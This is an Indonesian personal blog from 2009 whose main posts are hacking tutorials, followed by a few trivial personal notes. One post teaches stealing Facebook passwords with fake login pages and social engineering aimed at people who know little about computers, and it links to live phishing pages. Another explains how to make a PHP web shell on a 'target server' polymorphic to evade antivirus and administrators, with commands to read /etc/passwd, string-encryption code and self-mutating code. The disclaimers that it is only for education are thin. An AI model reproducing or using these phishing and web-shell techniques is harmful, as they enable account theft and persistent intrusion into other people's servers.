Kamis, 17 Desember 2009

Tutorial Cara Hack Facebook Tanpa Keylogger





Tutorial Cara Hack Facebook Tanpa Keylogger
Sebenarnya tutorial ini termasuk tingkatan level hacking yang paling bawah. Jika anda ingin berkembang menjadi hacker sejati, kreatif dan temukan sesuatu yang baru dan share ilmu serta pengalaman pribadi anda pada hacker/orang awam lain di facebook. Ilmu itu tidak ada batas dan temukan sendiri menurut cara anda masing2.


Saya sebenarnya tidak ingin jika tutorial ini disalah gunakan komunitas dan tidak bertanggung jawab atas segala ulah keisengan atau kegiatan kreatif kalian atas penyalahgunaan artikel ini. Sebenarnya tutorial ini murni sebagai wujud edukasi saja. Semoga anda tidak menjadi salah satu korban “kreatif” temen2 didunia maya. Lihat video diatas untuk mengetahui caranya.

Syarat menggunakan teknik ini setidaknya anda sudah harus tahu cara mengupload file ketempat file hostingan situs dan teman/user anda cukup awam pengetahuannya ttg security komputer. Gunakan juga social engineering kalian. Jika trik ini tidak berhasil berhasil lwn anda mungkin adalah seorang pakar komputer dan mungkin bahkan yang sering mengerjai anda dengan software ini. :)

Jangan lupa gunakan saja hostingan yang gratis. . Karena suatu sebab oleh komunitas underground, & dilarang menyebarluaskan code phishingnya. Daripada situs dan email abg dibom sesama hacker mending abg turuti itu kehendak baik komunitas underground. Solusinya terpaksa anda mencari sendiri via googling . Kalau anda ada niat dan usaha, pasti ada hasilnya.

saran:

1. ketiklah alamat situs facebook anda dengan benar. Jangan sampai ada embel2nya. misal jika anda mendapatkan alamat situs http://blockedfacebookaccounts.tk/ –> contoh phishing (untuk membuktikannya anda bisa akses itu situs, sekilas situsnya tampak sama, akan tetapi alamat url berbeda. Waspadalah)

abg udah coba tes phishing ini 100% coba saja akses situs ini:

http://arkandas.uuuq.com/Facebook.htm —>lalu anda masukan id login sembarang dan sembarang password juga, lalu tekan enter

untuk melihat password dan id login anda bisa diakses pada alamat

http://arkandas.uuuq.com/FacebookPasswords.htm –> piye keren ngak ????.

Update: barusan cek hasil phishing, ternyata ada yang laporin itu hasil kerjaan ke situs security. Sial, jadi dibanned itu situs kerjaan….

2. Berhati-hatilah kalau OL di warnet, pastikan tidak dipasang keylogger. Jika terpaksa harus masuk situs yang menggunakan sistem login anda bisa menggunakan softwaee keyboard virtual. Cukup masuk pada klik menu run dan ketikan “osk” tanpa tanda kutip. Nanti akan muncul keyboard digital. Silakan anda login passwordnya mengunakan software bawaan window tersebut.

3. berhati-hatilah karena hacker ada dimana saja. waspadalah, waspadalah.
Sebenarnya ada banyak bertebaran phishing di dunia maya, contohnya anda bisa terapkan juga phishing pada yahoo, gmail, msn, rapidshare, megaupload, dll. Semoga dengan artikel ini bisa membantu sedikit menambah pengetahuan betapa bahayanya situs phishing (fake situs).

Info tambahan:
untuk lebih parah dan semakih kejam kamu menghack facebook sasaran silahkan download file di bawah:
1. tutorial hack facebook
2. progi hack
3. Klik disini untuk mengetahui Cara Dapat Duit Dari Facebook
ingat jangan terlalu parah engerjain sasarannya! :lol:

Bagi yang biasa kewarnet untuk mencegah passwordnya di curi orang silahkan gunakan anti keylogger silahkan klik di sini Anti Keyloger :lol:

cara dapat duit dari facebook

Cara Hack Facebook .... ?? Bisa Kok


Cara Hack Facebook - Inilah cara hacking facebook paling mudah yang pernah anda temui. Sebenarnya perlu kita garis bawahi bahwa istilah "Cara Hack Facebook" ini cuma seledar embel-embel biar bahasanya kelihatan gaul. Kenapa gue bilang kayak gini ? Karena kalau orang bilang, "gue bisa nyuri password dia, atau gue bisa curi chip poker si A". Naah maka biar orang gampang untuk menyebutnya, dipakai istilah gaul "gue bisa hack facebook ". Terserah daah kalau loe pada setuju apa nggak. hhehehe.. *peace*

Sebelumnya ada baiknya buat kawan kawan yang mungkin masih belum tahu. klo sudah tahu ya sudah.. untuk baca yang ini : emoote.com/cara-hack-facebook-trik-jadul


Baiklah,.. untuk berbagi ilmu yang semoga ilmu ini tidak disalah gunakan. Maka gue bakalan ngajarin ke loe, gimana cara "mengetahui password atau email facebook seseorang dengan pakai trik lawas." Tapi sebelumnya gue mau kasih gambaran kepada loe semua. Bahwa hacking ini bersifat gak begitu 100% BISA dan BERHASIL. MEngapa ??
Karena trik yang gue gunakan disebut dengan istilah FAKE LOGIN.

Namun kalau loe pernah nemu software buat hack facebook mending jangan loe pakai, kecuali mau menerima resiko. Pasalnya tuh software yang kebetulan di blog ini juga ada, software hack facebook. sangat menyakitkan. Gimana tidak ? Lah ternyata yang buat software di selipkan virus nenek moyang seperti trojan, backdoor, sality, worm, pokoknya banyak banget. Maka dari itu saran gue bagi yang mau meng-extract software ini jangan pernah di komputer kamu sendiri, kecuali pakai alat pengaman kondom deepfreeze atau apalah. Atau solusi baiknya di warnet aja. hehehe..



Kembali ke permasalahan FAKE LOGIN, jadi cara gampangnya, bahwa alamat www.facebook.com itu diganti dengan alamat/url lain dan nanti tampilannya tetep sama kayak facebook, inilah yang kita sebut sebagai FAKE LOGIN. Coba perhatikan link dibawah

fesbuk aspal

apa yang kamu lihat ? facebook asli kan ? yaps.. tapi itu aspal.. dan jangan coba login disitu.. email sama pass loe bakal gue raib.. hahha... *yah gaklah bro, gak tega gue-


sekarang permasalahan tentang trik FAKE LOGIN, coba ente nalar. Kalau si korban udah high master alias senior atau mungkin malah hacker/cracker, mana mungkin cara basi ini bisa tembus.. Namun gak papa.. mungkin aja nanti korban loe orang gaptek dan gak ngerti dunia hacking, kayaknya peluang pasti ada.. hehhee..


Terus cara kerja bagaimana ??

Cara kerja dari fake login tidak perlu ruwet dan ribet. Karena kalau loe bisa dapetin korban alias mangsanya, maka email + pass bisa loe dapatin dengan mudah dan santai. Namun ada satu syarat bro.. !! Alamat yang ente gunakan harus alamat/url yang telah diramu menjadi fake login. Seperti yang punya saya ini fesbuk aspal. Terus kalau si korban sudah login disana, cara melihat email + password dimana ? hayooow .. ?? ente tinggal klik see my password. Gimana ? apakah tertarik untuk mencoba dan ingin membuatnya ?

Karena disini tidak memungkinkan untuk pembahasannya, mengingat keterbatasan space maka silahkan anda baca sini http://maestri-inv.com/cara-hack-facebook-dengan-cara-fake-login..


saya gak bermaksud untuk membuat anda bingung, dengan memberikan link ke blog lain. Namun ini juga dalam rangka promosi blog blog saya yang lain [heeheheh]. Enak to ? Sudah dapet ilmu koq masih ngeyel aja ... hahaha.. silahkan segera menuju kesini http://maestri-inv.com/cara-hack-facebook-dengan-cara-fake-login. Dan temukan cara yang sebenarnya !!!

Kamis, 26 November 2009

teman-teman





kerennnnnnnnnnnnnnnnnnnnnnnnn

Rabu, 25 November 2009

Membuat script PHP SHELL yang berpolymorphic untuk server target


Akhirnya setelah vakum beberapa bulan saya sempat menulis artikel di blog ini lagi. Topik yang saya bahas kali ini ialah PHP programming yang berguna untuk anda yang memiliki backdoor di server target.

Saya tidak akan menjelaskan bahasan tentang PoC atau proof of concept serangan, atau bagaimana caranya mendapatkan akses sehingga bisa memasang PHP SHELL di server. Tapi saya hanya ingin membahas bagaimana menciptakan script PHP SHELL yang lebih sukar untuk dideteksi oleh antivirus di server web.


PHP SHELL ialah sebuah injection script di server website yang berguna untuk mendapatkan akses shell. Dengan sebuah shell kita bisa mendapatkan akses File I/O, database, atau bahkan sistem layaknya seperti hak seorang admin dalam mengelola websitenya. Karena begitu berbahayanya sebuah PHP SHELL di server, biasanya para root mematikan fungsi - fungsi penting PHP yang memiliki fungsi bumerang bagi servernya, seperti fungsi system(). Bahkan antivirus khusus server web pun menjadikan PHP SHELL sebagai target operasi utamanya, selain berbagai macam rootkit backdoor yang lainnya.

Pada umumnya root menggunakan antivirus untuk menscan sistem dan mencari berbagai file yang memiliki hash MD5 berbahaya. Hash MD5 layaknya sebuah sidik jari pada sebuah file. Setiap konten file yang berbeda akan selalu memiliki hash MD5 yang berbeda. Oleh karena itu bisa dibayangkan jika sample PHP SHELL milik anda sudah dimiliki seorang root, maka dia dapat dengan mudah mencari seluruh PHP SHELL yang sudah ditanam diserver dan segera menghapus -bahkan membloknya dari white list running process. Semua ini dilakukan hanya dengan bermodalkan sidik jari PHP SHELL kita. Menyebalkan bukan?hehehe

Lalu bagaimanakah caranya agar sebuah script (apapun itu, tidak hanya PHP SHELL saja) bisa bertahan lebih lama di server target? Bagaimana caranya agar contoh PHP SHELL milik kita yang telah dimiliki admin tidak bisa digunakan dengan mudah untuk mencari lokasi script - script tersebut ditanam?

Polymorphic jawabannya.

Menurut simple saya, polymorphic code adalah sebuah teknik mutasi kode yang dilakukan oleh kode itu sendiri dan berfungsi untuk menyamarkan diri dengan selalu mengubah konten kode yang secara otomatis juga mengubah sidik jari / HASH dari kode tersebut.

Contoh kasus : Saya telah menanam ratusan PHP SHELL di server target dan sialnya, salah satu lokasi PHP SHELL saya telah diketahui oleh root. Maka dengan mudah seorang root akan mencari hash PHP SHELL saya, lalu mencari seluruh file di server yang memiliki hash sama. Nah, dengan PHP SHELL yang dilengkapi polymorphic, hash file yang dimiliki oleh root sudah pasti berbeda dengan ratusan PHP SHELL yang tersebar diservernya, WALAUPUN PADA DASARNYA SELURUH PHP SHELL YG SAYA TANAM IALAH FILE YANG SAMA. Jadi, langkah root untuk mengejar ratusan PHP SHELL lainnya akan jauh lebih sulit, apalagi jika sang root tidak memiliki kemampuan menganalisis kode PHP SHELL kita yang dienkripsi.

Misalnya mini php shell (shell.php) saya seperti ini :





Keterangan fungsinya :


/shell.php?cmd=about
> memunculkan versi php shell (biasanya utk kepentingan update otomatis)

/shell.php?cmd=readfile&file=/etc/passwd
> membaca isi file /etc/passwd di server

/shell.php?cmd=phpinfo
> menampilkan PHPINFO() yang merisikan informasi detil tentang PHP dan server web

/shell.php?cmd=ls -all
> melisting isi work direktori di server


Secara struktur kode, script di atas memiliki 6 string dan 2 nama variabel :

String Array : ('cmd', 'file', 'about', 'PHP SHELL BUATAN JUDOTENSLAB\nVersi 1.0.0', 'readfile', 'phpinfo')
Nama Variable : $shell_cmd dan $shell_file (variabel dengan prefix awalan $shell_ )

Pada kedua kunci utama inilah kita perlu enkripsi dan mutasi kode.
Mengapa? Karena biasanya sebuah string maupun nama variable lebih gampang dicari menggunakan teknik pendekatan konten oleh antivirus. Sehingga tugas kita meminimalisasi hasik pencarian dengan teknik seperti ini dengan cara mengenkripsi dan memutasikan kodenya.

Berikut saya lampirkan kode encrypt/decrypt string sederhana :



function shell_en($str){
global $shell_key;
for($i=0; $i< char =" substr($str," keychar =" substr($shell_key," char =" chr(ord($char)-ord($keychar));">



Dan berikut kode polymorphic sederhana yg dibuat berdasarkan struktur kode php shell saya di atas :



function polymorphic() {
global $shell_path, $shell_sess, $shell_morphic;
$shell_tmp = file_get_contents($shell_path);
$shell_tmc = str_replace("shell_path","refresh",$shell_tmp);
$shell_tmp = str_replace($shell_morphic, "sess".$shell_sess."_", $shell_tmc);
$shell_tmp = str_replace("refresh","shell_path",$shell_tmp);

$fh = fopen($shell_path, 'w') or die(core_de($shell_string[6]));
fwrite($fh, $shell_tmp);
fclose($fh);
}


Langkah - langkah pembentukan kode :
1. Tentukan key untuk enkripsi anda dan simpan di variabel $shell_key, misalnya :
$shell_key = 'rahasia';

2. Enkripsi seluruh string utama yang anda gunakan di kode dengan memanggil fungsi shell_en('stringanda'), misal hasilnya seperti ini :



$shell_string = array('xN/F','x9vNzQ==','wtTQ3dU=','sbqxiLS7rq2+gaq2tL2iwIGytre4tbevu620q73gt83T5tKBo4+Yj6M=','09fCzMfc1cY=','0drR0c/Z2A==');


3. Tentukan string yang selalu acak untuk memutasi kode dan simpan di variabel $shell_sess, misalnya :


$shell_sess = $_SERVER['REQUEST_TIME']; // mendapatkan string acak dari waktu request http

Berikut kode utuh setelah shell.php saya bubuhkan fungsi enkripsi dan polymorphic







Sekarang silahkan coba script tersebut di server target anda, dan coba perbedaannya dengan ketika kode setelah dieksekusi :





Sudah berubah bukan? Dan struktur kode ini akan selalu berubah ketika kode tersebut dipanggil. Yap, kini anda telah memiliki polymorphic php shell sendiri!

Jika anda ingin PHP SHELL ini lebih privat, maka tentukan $shell_key pribadi anda dan enkripsi seluruh string tadi dengan $shell_key anda. Setelah itu gantilah baris
$shell_key = 'rahasia'; menjadi $shell_key = $_REQUEST['key'];

dengan begitu, maka setiap pemanggilan shell harus menyertakan key enkripsi anda dalam field request, jika keynya tidak sah maka php shell pun tidak akan berfungsi karena proses dekripsinya gagal.
Contoh pemanggilan privat php shellnya :



/shell.php?key=rahasia&cmd=about

coba anda bandingkan dengan pemanggilan biasa seperti ini :
/shell.php?cmd=about



Semoga artikel ini cukup bermanfaat untuk anda yang sedang mencari referensi tentang PHP SHELL, maupun teknik POLYMORPHIC. Maafkan saya atas gaya bahasa yang agak sukar dimengerti karena keterbatasan daya penjelasan saya.

Silahkan kirim email ke saya jika ingin mempelajari lebih dalam materi tersebut.

Akhir kata, silahkan menikmati sajian saya kali ini dengan kepala dingin anda. Setiap materi pembelajaran ditujukan hanya untuk kepentingan edukasi, dan sama sekali bukan provokatif untuk merusak sistem orang lain.

Use it at your own risk..

Salam,
Jun

Sabtu, 10 Oktober 2009

welcome

hayy temen" selamat datang di dunia maya

Selasa, 04 Agustus 2009

Cinta jeng ida

loveeeeeeeeeeeeeeeeeeeeeeeeee jeng idaaaaaaaaaaaaaaaaaaa

Ardinet mencari cinta

Di kudus
Warnet Ardinet membutuhkan seorang Pria yg tampan hehehehe
Jeng ida minta di kenalin co yg sejati..hahahahaa